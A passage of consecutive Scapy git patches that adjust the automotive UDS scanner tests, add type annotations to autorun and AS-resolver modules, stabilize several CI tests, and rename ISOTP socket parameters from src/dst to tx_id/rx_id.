EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=3, routineIdentifier=3)/Raw(b"beef3")]), - EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=0x10)/Raw(b"beefff")]), EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="RoutineControl")])] es = [UDS_RCEnumerator] -scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RCEnumerator_kwargs={"scan_range": range(0x100)}) +scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RCEnumerator_kwargs={"scan_range": range(0x11)}) assert scanner.scan_completed tc = scanner.configuration.test_cases[0] @@ -628,7 +628,7 @@ assert len(tc.results_without_response) < 10 if tc.results_without_response: tc.show() -assert len(tc.results_with_negative_response) == 0x100 * 3 - 4 +assert len(tc.results_with_negative_response) == 0x11 * 3 - 4 assert len(tc.results_with_positive_response) == 4 assert len(tc.scanned_states) == 1 @@ -641,7 +641,7 @@ ids = [t.req.routineIdentifier for t in tc.results_with_positive_response] assert 1 in ids assert 2 in ids assert 3 in ids -assert 0xff in ids +assert 0x10 in ids = UDS_RCSelectiveEnumerator @@ -649,12 +649,12 @@ assert 0xff in ids resps = [EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=1)/Raw(b"asdfbeef1")]), EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=2, routineIdentifier=1)/Raw(b"beef2")]), EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=3, routineIdentifier=1)/Raw(b"beef3")]), - EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=0x10)/Raw(b"beefff")]), EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="RoutineControl")])] es = [UDS_RCSelectiveEnumerator] -scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RCStartEnumerator_kwargs={"scan_range": range(0x100)}) +scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RCStartEnumerator_kwargs={"scan_range": range(0x11)}) assert scanner.scan_completed tc = scanner.configuration.stages[0][0] @@ -663,7 +663,7 @@ assert len(tc.results_without_response) < 10 if tc.results_without_response: tc.show() -assert len(tc.results_with_negative_response) == 0x100 - 2 +assert len(tc.results_with_negative_response) == 0x11 - 2 assert len(tc.results_with_positive_response) == 2 assert len(tc.scanned_states) == 1 @@ -674,7 +674,7 @@ assert "subFunctionNotSupported received" in result ids = [t.req.routineIdentifier for t in tc.results_with_positive_response] assert 1 in ids -assert 0xff in ids +assert 0x10 in ids tc = scanner.configuration.stages[0][1] @@ -682,7 +682,7 @@ assert len(tc.results_without_response) < 10 if tc.results_without_response: tc.show() -assert len(tc.results_with_negative_response) == 1016 +assert len(tc.results_with_negative_response) == 538 assert len(tc.results_with_positive_response) == 2 assert len(tc.scanned_states) == 1 @@ -778,7 +778,7 @@ result = tc1.show(dump=True) assert "requestOutOfRange received " in result = UDS_RMBAEnumerator -~ not_pypy +~ not_pypy disabled memory = dict() @@ -835,7 +835,7 @@ assert len(tc1.results_without_response) < 30 if len(tc1.results_without_response): tc1.show() -assert len(tc1.results_with_negative_response) > 100 +assert len(tc1.results_with_negative_response) > 10 assert len(tc1.results_with_positive_response) > 300 assert len(tc1.scanned_states) == 1 diff --git a/test/testsocket.py b/test/testsocket.py index 52bdc174230..81a87ea41a1 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -48,13 +48,13 @@ def close(self): for s in self.paired_sockets: try: s.paired_sockets.remove(self) - except ValueError: + except (ValueError, AttributeError, TypeError): pass self.closed = True super(TestSocket, self).close() try: open_test_sockets.remove(self) - except ValueError: + except (ValueError, AttributeError, TypeError): pass def pair(self, sock): From 7e161f1d1fd371887021713b3c0431e0a31f551b Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 10 Dec 2021 14:19:51 +0100 Subject: [PATCH 0708/1632] Change some private variables to protected variables in EcuAnsweringMachine (#3453) --- scapy/contrib/automotive/ecu.py | 42 ++++++++++++++++----------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index a385e62d11e..362a0530487 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -599,35 +599,35 @@ def parse_options( :param basecls: Provide a basecls of the used protocol :param timeout: Specifies the timeout for sniffing in seconds. """ - self.__main_socket = main_socket # type: Optional[SuperSocket] - self.__sockets = [self.__main_socket] + self._main_socket = main_socket # type: Optional[SuperSocket] + self._sockets = [self._main_socket] if broadcast_socket is not None: - self.__sockets.append(broadcast_socket) + self._sockets.append(broadcast_socket) - self.__initial_ecu_state = initial_ecu_state or EcuState(session=1) - self.__ecu_state_mutex = Lock() - self.reset_state() + self._initial_ecu_state = initial_ecu_state or EcuState(session=1) + self._ecu_state_mutex = Lock() + self._ecu_state = copy.copy(self._initial_ecu_state) - self.__basecls = basecls # type: Type[Packet] - self.__supported_responses = supported_responses + self._basecls = basecls # type: Type[Packet] + self._supported_responses = supported_responses self.sniff_options["timeout"] = timeout - self.sniff_options["opened_socket"] = self.__sockets + self.sniff_options["opened_socket"] = self._sockets @property def state(self): # type: () -> EcuState - return self.__ecu_state + return self._ecu_state def reset_state(self): # type: () -> None - with self.__ecu_state_mutex: - self.__ecu_state = copy.copy(self.__initial_ecu_state) + with self._ecu_state_mutex: + self._ecu_state = copy.copy(self._initial_ecu_state) def is_request(self, req): # type: (Packet) -> bool - return isinstance(req, self.__basecls) + return isinstance(req, self._basecls) def make_reply(self, req): # type: (Packet) -> PacketList @@ -644,25 +644,25 @@ def make_reply(self, req): :param req: A request packet :return: A list of response packets """ - if self.__supported_responses is not None: - for resp in self.__supported_responses: + if self._supported_responses is not None: + for resp in self._supported_responses: if not isinstance(resp, EcuResponse): raise TypeError("Unsupported type for response. " "Please use `EcuResponse` objects.") - with self.__ecu_state_mutex: - if not resp.supports_state(self.__ecu_state): + with self._ecu_state_mutex: + if not resp.supports_state(self._ecu_state): continue if not resp.answers(req): continue EcuState.get_modified_ecu_state( - resp.key_response, req, self.__ecu_state, True) + resp.key_response, req, self._ecu_state, True) return resp.responses - return PacketList([self.__basecls( + return PacketList([self._basecls( b"\x7f" + bytes(req)[0:1] + b"\x10")]) def send_reply(self, reply): @@ -678,5 +678,5 @@ def send_reply(self, reply): time.sleep(conf.contribs['EcuAnsweringMachine']['send_delay']) if len(reply) > 1: time.sleep(random.uniform(0.01, 0.5)) - if self.__main_socket: - self.__main_socket.send(p) + if self._main_socket: + self._main_socket.send(p) From 11f481d3fe4a30cbaba2d8f0d2ebed16150eae0a Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 17 Nov 2021 14:40:04 +0100 Subject: [PATCH 0709/1632] Type scapy/autorun.py --- .config/mypy/mypy_enabled.txt | 1 + scapy/autorun.py | 48 ++++++++++++++++++++++++++++------- scapy/compat.py | 3 +++ 3 files changed, 43 insertions(+), 9 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index ecab6dc63e3..a021741e5ba 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -20,6 +20,7 @@ scapy/asn1/mib.py scapy/asn1fields.py scapy/asn1packet.py scapy/automaton.py +scapy/autorun.py scapy/base_classes.py scapy/compat.py scapy/config.py diff --git a/scapy/autorun.py b/scapy/autorun.py index d5c569df156..649f98ce514 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -18,6 +18,15 @@ from scapy.themes import NoTheme, DefaultTheme, HTMLTheme2, LatexTheme2 from scapy.error import log_scapy, Scapy_Exception from scapy.utils import tex_escape + +from scapy.compat import ( + Any, + Optional, + TextIO, + Dict, + Tuple, +) + from scapy.modules.six.moves import queue import scapy.modules.six as six @@ -36,21 +45,23 @@ class StopAutorunTimeout(StopAutorun): class ScapyAutorunInterpreter(code.InteractiveInterpreter): def __init__(self, *args, **kargs): + # type: (*Any, **Any) -> None code.InteractiveInterpreter.__init__(self, *args, **kargs) def write(self, data): + # type: (str) -> None pass -def autorun_commands(cmds, my_globals=None, verb=None): +def autorun_commands(_cmds, my_globals=None, verb=None): + # type: (str, Optional[Dict[str, Any]], Optional[int]) -> Any sv = conf.verb try: try: - interp = ScapyAutorunInterpreter() if my_globals is None: from scapy.main import _scapy_builtins my_globals = _scapy_builtins() - interp.locals = my_globals + interp = ScapyAutorunInterpreter(locals=my_globals) try: del six.moves.builtins.__dict__["scapy_session"]["_"] except KeyError: @@ -58,7 +69,7 @@ def autorun_commands(cmds, my_globals=None, verb=None): if verb is not None: conf.verb = verb cmd = "" - cmds = cmds.splitlines() + cmds = _cmds.splitlines() cmds.append("") # ensure we finish multi-line commands cmds.reverse() while True: @@ -94,6 +105,7 @@ def autorun_commands(cmds, my_globals=None, verb=None): def autorun_commands_timeout(cmds, timeout=None, **kwargs): + # type: (str, Optional[int], **Any) -> Any """ Wraps autorun_commands with a timeout that raises StopAutorunTimeout on expiration. @@ -104,6 +116,7 @@ def autorun_commands_timeout(cmds, timeout=None, **kwargs): q = queue.Queue() def _runner(): + # type: () -> None q.put(autorun_commands(cmds, **kwargs)) th = threading.Thread(target=_runner) th.daemon = True @@ -114,26 +127,31 @@ def _runner(): return q.get() -class StringWriter(object): +class StringWriter(six.StringIO): """Util to mock sys.stdout and sys.stderr, and store their output in a 's' var.""" def __init__(self, debug=None): + # type: (Optional[TextIO]) -> None self.s = "" self.debug = debug def write(self, x): + # type: (str) -> int # Object can be in the middle of being destroyed. - if getattr(self, "debug", None): + if getattr(self, "debug", None) and self.debug: self.debug.write(x) if getattr(self, "s", None) is not None: self.s += x + return len(x) def flush(self): - if getattr(self, "debug", None): + # type: () -> None + if getattr(self, "debug", None) and self.debug: self.debug.flush() def autorun_get_interactive_session(cmds, **kargs): + # type: (str, **Any) -> Tuple[str, Any] """Create an interactive session and execute the commands passed as "cmds" and return all output @@ -162,6 +180,7 @@ def autorun_get_interactive_session(cmds, **kargs): def autorun_get_interactive_live_session(cmds, **kargs): + # type: (str, **Any) -> Tuple[str, Any] """Create an interactive session and execute the commands passed as "cmds" and return all output @@ -184,6 +203,7 @@ def autorun_get_interactive_live_session(cmds, **kargs): def autorun_get_text_interactive_session(cmds, **kargs): + # type: (str, **Any) -> Tuple[str, Any] ct = conf.color_theme try: conf.color_theme = NoTheme() @@ -194,6 +214,7 @@ def autorun_get_text_interactive_session(cmds, **kargs): def autorun_get_live_interactive_session(cmds, **kargs): + # type: (str, **Any) -> Tuple[str, Any] ct = conf.color_theme try: conf.color_theme = DefaultTheme() @@ -204,6 +225,7 @@ def autorun_get_live_interactive_session(cmds, **kargs): def autorun_get_ansi_interactive_session(cmds, **kargs): + # type: (str, **Any) -> Tuple[str, Any] ct = conf.color_theme try: conf.color_theme = DefaultTheme() @@ -214,8 +236,12 @@ def autorun_get_ansi_interactive_session(cmds, **kargs): def autorun_get_html_interactive_session(cmds, **kargs): + # type: (str, **Any) -> Tuple[str, Any] ct = conf.color_theme - to_html = lambda s: s.replace("<", "<").replace(">", ">").replace("#[#", "<").replace("#]#", ">") # noqa: E501 + + def to_html(s): + # type: (str) -> str + return s.replace("<", "<").replace(">", ">").replace("#[#", "<").replace("#]#", ">") # noqa: E501 try: try: conf.color_theme = HTMLTheme2() @@ -230,8 +256,12 @@ def autorun_get_html_interactive_session(cmds, **kargs): def autorun_get_latex_interactive_session(cmds, **kargs): + # type: (str, **Any) -> Tuple[str, Any] ct = conf.color_theme - to_latex = lambda s: tex_escape(s).replace("@[@", "{").replace("@]@", "}").replace("@`@", "\\") # noqa: E501 + + def to_latex(s): + # type: (str) -> str + return tex_escape(s).replace("@[@", "{").replace("@]@", "}").replace("@`@", "\\") # noqa: E501 try: try: conf.color_theme = LatexTheme2() diff --git a/scapy/compat.py b/scapy/compat.py index 12a4fd68379..b91dfd6325b 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -42,6 +42,7 @@ 'Sequence', 'Set', 'Sized', + 'TextIO', 'Tuple', 'Type', 'TypeVar', @@ -137,6 +138,7 @@ def __repr__(self): Sequence, Set, Sized, + TextIO, Tuple, Type, TypeVar, @@ -168,6 +170,7 @@ def cast(_type, obj): # type: ignore Sequence = _FakeType("Sequence") # type: ignore Sequence = _FakeType("Sequence", list) # type: ignore Set = _FakeType("Set", set) # type: ignore + TextIO = _FakeType("TextIO") # type: ignore Tuple = _FakeType("Tuple") Type = _FakeType("Type", type) TypeVar = _FakeType("TypeVar") # type: ignore From 82e83e02b8f8f92fed25924c4aed1569d43501cb Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 18 Nov 2021 00:48:31 +0100 Subject: [PATCH 0710/1632] Type as_resolvers --- .config/mypy/mypy_enabled.txt | 1 + scapy/as_resolvers.py | 43 +++++++++++++++++++++++++---------- scapy/autorun.py | 1 + scapy/config.py | 4 +++- 4 files changed, 36 insertions(+), 13 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index a021741e5ba..5185f07a01a 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -13,6 +13,7 @@ scapy/arch/__init__.py scapy/arch/common.py scapy/arch/linux.py scapy/arch/unix.py +scapy/as_resolvers.py scapy/asn1/__init__.py scapy/asn1/asn1.py scapy/asn1/ber.py diff --git a/scapy/as_resolvers.py b/scapy/as_resolvers.py index 50e827904ca..e75d0551197 100644 --- a/scapy/as_resolvers.py +++ b/scapy/as_resolvers.py @@ -13,12 +13,20 @@ from scapy.config import conf from scapy.compat import plain_str +from scapy.compat import ( + Any, + Optional, + Tuple, + List, +) + class AS_resolver: server = None - options = "-k" + options = "-k" # type: Optional[str] def __init__(self, server=None, port=43, options=None): + # type: (Optional[str], int, Optional[str]) -> None if server is not None: self.server = server self.port = port @@ -26,6 +34,7 @@ def __init__(self, server=None, port=43, options=None): self.options = options def _start(self): + # type: () -> None self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s.connect((self.server, self.port)) if self.options: @@ -33,9 +42,11 @@ def _start(self): self.s.recv(8192) def _stop(self): + # type: () -> None self.s.close() def _parse_whois(self, txt): + # type: (bytes) -> Tuple[Optional[str], str] asn, desc = None, b"" for line in txt.splitlines(): if not asn and line.startswith(b"origin:"): @@ -49,6 +60,7 @@ def _parse_whois(self, txt): return asn, plain_str(desc.strip()) def _resolve_one(self, ip): + # type: (str) -> Tuple[str, Optional[str], str] self.s.send(("%s\n" % ip).encode("utf8")) x = b"" while not (b"%" in x or b"source" in x): @@ -56,9 +68,12 @@ def _resolve_one(self, ip): asn, desc = self._parse_whois(x) return ip, asn, desc - def resolve(self, *ips): + def resolve(self, + *ips # type: str + ): + # type: (...) -> List[Tuple[str, Optional[str], str]] self._start() - ret = [] + ret = [] # type: List[Tuple[str, Optional[str], str]] for ip in ips: ip, asn, desc = self._resolve_one(ip) if asn is not None: @@ -81,7 +96,10 @@ class AS_resolver_cymru(AS_resolver): server = "whois.cymru.com" options = None - def resolve(self, *ips): + def resolve(self, + *ips # type: str + ): + # type: (...) -> List[Tuple[str, Optional[str], str]] s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.server, self.port)) s.send( @@ -100,11 +118,11 @@ def resolve(self, *ips): return self.parse(r) def parse(self, data): + # type: (bytes) -> List[Tuple[str, Optional[str], str]] """Parse bulk cymru data""" - ASNlist = [] - for line in data.splitlines()[1:]: - line = plain_str(line) + ASNlist = [] # type: List[Tuple[str, Optional[str], str]] + for line in plain_str(data).splitlines()[1:]: if "|" not in line: continue asn, ip, desc = [elt.strip() for elt in line.split('|')] @@ -116,16 +134,17 @@ def parse(self, data): class AS_resolver_multi(AS_resolver): - resolvers_list = (AS_resolver_riswhois(), AS_resolver_radb(), - AS_resolver_cymru()) - resolvers_list = resolvers_list[1:] - def __init__(self, *reslist): + # type: (*AS_resolver) -> None AS_resolver.__init__(self) if reslist: self.resolvers_list = reslist + else: + self.resolvers_list = (AS_resolver_radb(), + AS_resolver_cymru()) def resolve(self, *ips): + # type: (*Any) -> List[Tuple[str, Optional[str], str]] todo = ips ret = [] for ASres in self.resolvers_list: @@ -133,7 +152,7 @@ def resolve(self, *ips): res = ASres.resolve(*todo) except socket.error: continue - todo = [ip for ip in todo if ip not in [r[0] for r in res]] + todo = tuple(ip for ip in todo if ip not in [r[0] for r in res]) ret += res if not todo: break diff --git a/scapy/autorun.py b/scapy/autorun.py index 649f98ce514..a99e756e92b 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -134,6 +134,7 @@ def __init__(self, debug=None): # type: (Optional[TextIO]) -> None self.s = "" self.debug = debug + six.StringIO.__init__(self) def write(self, x): # type: (str) -> int diff --git a/scapy/config.py b/scapy/config.py index f62b6962db9..4f13152ec17 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -47,6 +47,7 @@ if TYPE_CHECKING: # Do not import at runtime + import scapy.as_resolvers from scapy.packet import Packet import scapy.asn1.asn1 import scapy.asn1.mib @@ -702,7 +703,8 @@ class Conf(ConfClass): commands = CommandsList() # type: CommandsList #: Codec used by default for ASN1 objects ASN1_default_codec = None # type: 'scapy.asn1.asn1.ASN1Codec' - AS_resolver = None #: choose the AS resolver class to use + #: choose the AS resolver class to use + AS_resolver = None # type: scapy.as_resolvers.AS_resolver dot15d4_protocol = None # Used in dot15d4.py logLevel = Interceptor("logLevel", log_scapy.level, _loglevel_changer) #: if 0, doesn't check that IPID matches between IP sent and From 609b7affdfc662e94bf30e6182e3950d8bc4c532 Mon Sep 17 00:00:00 2001 From: Leonard Crestez Date: Sun, 19 Dec 2021 10:53:52 +0200 Subject: [PATCH 0711/1632] Fix #3489: test failure on "pcapng file with a Decryption Secrets Block" Fix failing because os.system returns 0, this means success for a shell process but failure for utsscapy. Also check if editcap tool is present first. Fixes #3489 Signed-off-by: Leonard Crestez --- test/tls.uts | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/test/tls.uts b/test/tls.uts index 7d50f0221b4..b459e0bbf60 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1586,15 +1586,15 @@ conf = bck_conf = pcapng file with a Decryption Secrets Block ~ tshark linux -bck_conf = conf - -key_log_path = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.keys.txt") -pcap_path = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.pcap") -pcapng_path = get_temp_file() -os.system("editcap --inject-secrets tls,%s %s %s" % (key_log_path, pcap_path, pcapng_path)) - -packets = rdpcap(pcapng_path) -assert b"GET /secret.txt HTTP/1.0\n" in packets[11].msg[0].data -assert b"z2|gxarIKOxt,G1d>.Q2MzGY[k@" in packets[13].msg[0].data - -conf = bck_conf +import shutil +if shutil.which("editcap"): + bck_conf = conf + key_log_path = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.keys.txt") + pcap_path = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.pcap") + pcapng_path = get_temp_file() + exit_status = os.system("editcap --inject-secrets tls,%s %s %s" % (key_log_path, pcap_path, pcapng_path)) + assert(exit_status == 0) + packets = rdpcap(pcapng_path) + assert b"GET /secret.txt HTTP/1.0\n" in packets[11].msg[0].data + assert b"z2|gxarIKOxt,G1d>.Q2MzGY[k@" in packets[13].msg[0].data + conf = bck_conf From 65d4ba6e9b4f06518fb8320f06bfdba21802fd33 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 19 Dec 2021 15:46:13 +0100 Subject: [PATCH 0712/1632] Make IPv6 route checks more flexible --- test/regression.uts | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/test/regression.uts b/test/regression.uts index 32b822d7aa0..c69bb06313a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -310,11 +310,13 @@ conf.route6 # Doesn't pass on Travis Bionic XXX if len(routes6) > 2 and not WINDOWS: + # Identify routes to fe80::/64 assert(sum(1 for r in routes6 if r[0] == "::1" and r[4] == ["::1"]) >= 1) if not OPENBSD and len(iflist) >= 2: assert sum(1 for r in routes6 if r[0] == "fe80::" and r[1] == 64) >= 1 try: - assert sum(1 for r in routes6 if in6_islladdr(r[0]) and r[1] == 128 and r[4] == ["::1"]) >= 1 + # Identify a route to a node IPv6 link-local address + assert sum(1 for r in routes6 if in6_islladdr(r[0]) and r[1] == 128) >= 1 except: # IPv6 is not available, but we still check the loopback assert conf.route6.route("::/0") == (conf.loopback_name, "::", "::") From f50fc2f160e74631c710455c546afe8328f166be Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 20 Dec 2021 19:47:10 +0100 Subject: [PATCH 0713/1632] CI stabilization (#3492) * nmap test stabilization. Add random trailer to filename to avoid permission errors on macOS * add retry_test to 'Test sniffing on multiple sockets' * Modify mib regex to please CodeQL --- scapy/asn1/mib.py | 2 +- test/nmap.uts | 6 ++++-- test/regression.uts | 35 +++++++++++++++++------------------ 3 files changed, 22 insertions(+), 21 deletions(-) diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 6109047bb39..a5768a62cec 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -32,7 +32,7 @@ _mib_re_integer = re.compile(r"^[0-9]+$") _mib_re_both = re.compile(r"^([a-zA-Z_][a-zA-Z0-9_-]*)\(([0-9]+)\)$") _mib_re_oiddecl = re.compile( - r"$\s*([a-zA-Z0-9_-]+)\s+OBJECT([^:\{\}]|\{[^:]+\})+::=\s*\{([^\}]+)\}", re.M) + r"$\s*([a-zA-Z0-9_-]+)\s+OBJECT[^:\{\}]+::=\s*\{([^\}]+)\}", re.M) _mib_re_strings = re.compile(r'"[^"]*"') _mib_re_comments = re.compile(r'--.*(\r|\n)') diff --git a/test/nmap.uts b/test/nmap.uts index 5dd15f3eb94..8003b5f2423 100644 --- a/test/nmap.uts +++ b/test/nmap.uts @@ -26,13 +26,15 @@ try: except ImportError: from urllib2 import urlopen +filename = 'nmap-os-fingerprints' + str(RandString(6)) + def _test(): - with open('nmap-os-fingerprints', 'wb') as fd: + with open(filename, 'wb') as fd: fd.write(urlopen('https://raw.githubusercontent.com/nmap/nmap/9efe1892/nmap-os-fingerprints').read()) retry_test(_test) -conf.nmap_base = 'nmap-os-fingerprints' +conf.nmap_base = filename = Database loading ~ netaccess diff --git a/test/regression.uts b/test/regression.uts index c69bb06313a..a34ec66965c 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1406,25 +1406,24 @@ finally: # This test sniffs on the same interface twice at the same time, to # simulate sniffing on multiple interfaces. -iface = conf.route.route("www.google.com")[0] -port = int(RandShort()) -pkt = IP(dst="www.google.com")/TCP(sport=port, dport=80, flags="S") - -def cb(): - sr1(pkt, timeout=3) - -sniffer = AsyncSniffer(started_callback=cb, - iface=[iface, iface], - lfilter=lambda x: TCP in x and x[TCP].dport == port, - prn=lambda x: x.summary(), - count=2) -sniffer.start() -sniffer.join(timeout=3) - -assert len(sniffer.results) == 2 +def _test(): + iface = conf.route.route("www.google.com")[0] + port = int(RandShort()) + pkt = IP(dst="www.google.com")/TCP(sport=port, dport=80, flags="S") + def cb(): + sr1(pkt, timeout=3) + sniffer = AsyncSniffer(started_callback=cb, + iface=[iface, iface], + lfilter=lambda x: TCP in x and x[TCP].dport == port, + prn=lambda x: x.summary(), + count=2) + sniffer.start() + sniffer.join(timeout=3) + assert len(sniffer.results) == 2 + for pkt in sniffer.results: + assert pkt.sniffed_on == iface -for pkt in sniffer.results: - assert pkt.sniffed_on == iface +retry_test(_test) = Sending a TCP syn 'forever' at layer 2 and layer 3 ~ netaccess needs_root IP From 4f5574344c3efe2d45b6a0c4968ed471e7670c11 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 21 Dec 2021 12:05:43 +0100 Subject: [PATCH 0714/1632] Unify ISOTP naming (#3488) --- doc/scapy/layers/automotive.rst | 10 +- scapy/contrib/automotive/ecu.py | 2 +- scapy/contrib/automotive/gm/gmlanutils.py | 4 +- scapy/contrib/isotp/isotp_native_socket.py | 42 ++++---- scapy/contrib/isotp/isotp_packet.py | 82 ++++++++-------- scapy/contrib/isotp/isotp_scanner.py | 18 ++-- scapy/contrib/isotp/isotp_soft_socket.py | 62 ++++++------ scapy/contrib/isotp/isotp_utils.py | 58 +++++------ test/contrib/automotive/ecu.uts | 14 +-- test/contrib/automotive/gm/scanner.uts | 2 +- .../automotive/scanner/uds_scanner.uts | 2 +- test/contrib/isotp_message_builder.uts | 96 +++++++++---------- test/contrib/isotp_native_socket.uts | 90 ++++++++--------- test/contrib/isotp_packet.uts | 86 ++++++++--------- test/contrib/isotp_soft_socket.uts | 44 ++++----- test/contrib/isotpscan.uts | 88 ++++++++--------- test/tools/isotpscanner.uts | 14 +-- 17 files changed, 359 insertions(+), 355 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 46b96df937b..eab616bae0c 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -753,19 +753,19 @@ ISOTP message Creating an ISOTP message:: load_contrib('isotp') - ISOTP(src=0x241, dst=0x641, data=b"\x3eabc") + ISOTP(tx_id=0x241, rx_id=0x641, data=b"\x3eabc") Creating an ISOTP message with extended addressing:: - ISOTP(src=0x241, dst=0x641, exdst=0x41, data=b"\x3eabc") + ISOTP(tx_id=0x241, rx_id=0x641, rx_ext_address=0x41, data=b"\x3eabc") Creating an ISOTP message with extended addressing:: - ISOTP(src=0x241, dst=0x641, exdst=0x41, exsrc=0x41, data=b"\x3eabc") + ISOTP(tx_id=0x241, rx_id=0x641, rx_ext_address=0x41, ext_address=0x41, data=b"\x3eabc") Create CAN-frames from an ISOTP message:: - ISOTP(src=0x241, dst=0x641, exdst=0x41, exsrc=0x55, data=b"\x3eabc" * 10).fragment() + ISOTP(tx_id=0x241, rx_id=0x641, rx_ext_address=0x41, ext_address=0x55, data=b"\x3eabc" * 10).fragment() Send ISOTP message over ISOTP socket:: @@ -786,7 +786,7 @@ is using the Linux kernel module from Hartkopp. The other implementation, the `` is completely implemented in Python. This implementation can be used on Linux, Windows, and OSX. -An ``ISOTPSocket`` will not respect ``src, dst, exdst, exsrc`` of an ``ISOTP`` +An ``ISOTPSocket`` will not respect ``tx_id, rx_id, rx_ext_address, ext_address`` of an ``ISOTP`` message object. System compatibilities diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 362a0530487..9fde1efa260 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -568,7 +568,7 @@ class EcuAnsweringMachine(AnsweringMachine[PacketList]): Usage: >>> resp = EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10)) - >>> sock = ISOTPSocket(can_iface, sid=0x700, did=0x600, basecls=UDS) + >>> sock = ISOTPSocket(can_iface, tx_id=0x700, rx_id=0x600, basecls=UDS) >>> answering_machine = EcuAnsweringMachine(supported_responses=[resp], main_socket=sock, basecls=UDS) >>> sim = threading.Thread(target=answering_machine, kwargs={'count': 4, 'timeout':5}) >>> sim.start() diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index 32573c83ac6..f5b958f6182 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -392,5 +392,5 @@ def GMLAN_BroadcastSocket(interface): :param interface: interface name :return: ISOTPSocket configured as GMLAN Broadcast Socket """ - return ISOTPSocket(interface, sid=0x101, did=0x0, basecls=GMLAN, - extended_addr=0xfe, padding=True) + return ISOTPSocket(interface, tx_id=0x101, rx_id=0x0, basecls=GMLAN, + ext_address=0xfe, padding=True) diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index a5dc89a4097..4dcde79aef3 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -262,13 +262,13 @@ def __set_option_flags(self, def __init__(self, iface=None, # type: Optional[Union[str, SuperSocket]] - sid=0, # type: int - did=0, # type: int - extended_addr=None, # type: Optional[int] - extended_rx_addr=None, # type: Optional[int] + tx_id=0, # type: int + rx_id=0, # type: int + ext_address=None, # type: Optional[int] + rx_ext_address=None, # type: Optional[int] listen_only=False, # type: bool padding=False, # type: bool - transmit_time=100, # type: int + frame_txtime=100, # type: int stmin=0, # type: int basecls=ISOTP # type: Type[Packet] ): @@ -292,16 +292,16 @@ def __init__(self, self.can_socket = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, CAN_ISOTP) self.__set_option_flags(self.can_socket, - extended_addr, - extended_rx_addr, + ext_address, + rx_ext_address, listen_only, padding, - transmit_time) + frame_txtime) - self.src = sid - self.dst = did - self.exsrc = extended_addr - self.exdst = extended_rx_addr + self.tx_id = tx_id + self.rx_id = rx_id + self.ext_address = ext_address + self.rx_ext_address = rx_ext_address self.can_socket.setsockopt(SOL_CAN_ISOTP, CAN_ISOTP_RECV_FC, @@ -316,7 +316,7 @@ def __init__(self, 1 ) - self.__bind_socket(self.can_socket, self.iface, sid, did) + self.__bind_socket(self.can_socket, self.iface, tx_id, rx_id) self.ins = self.can_socket self.outs = self.can_socket if basecls is None: @@ -359,12 +359,12 @@ def recv(self, x=0xffff): if msg is 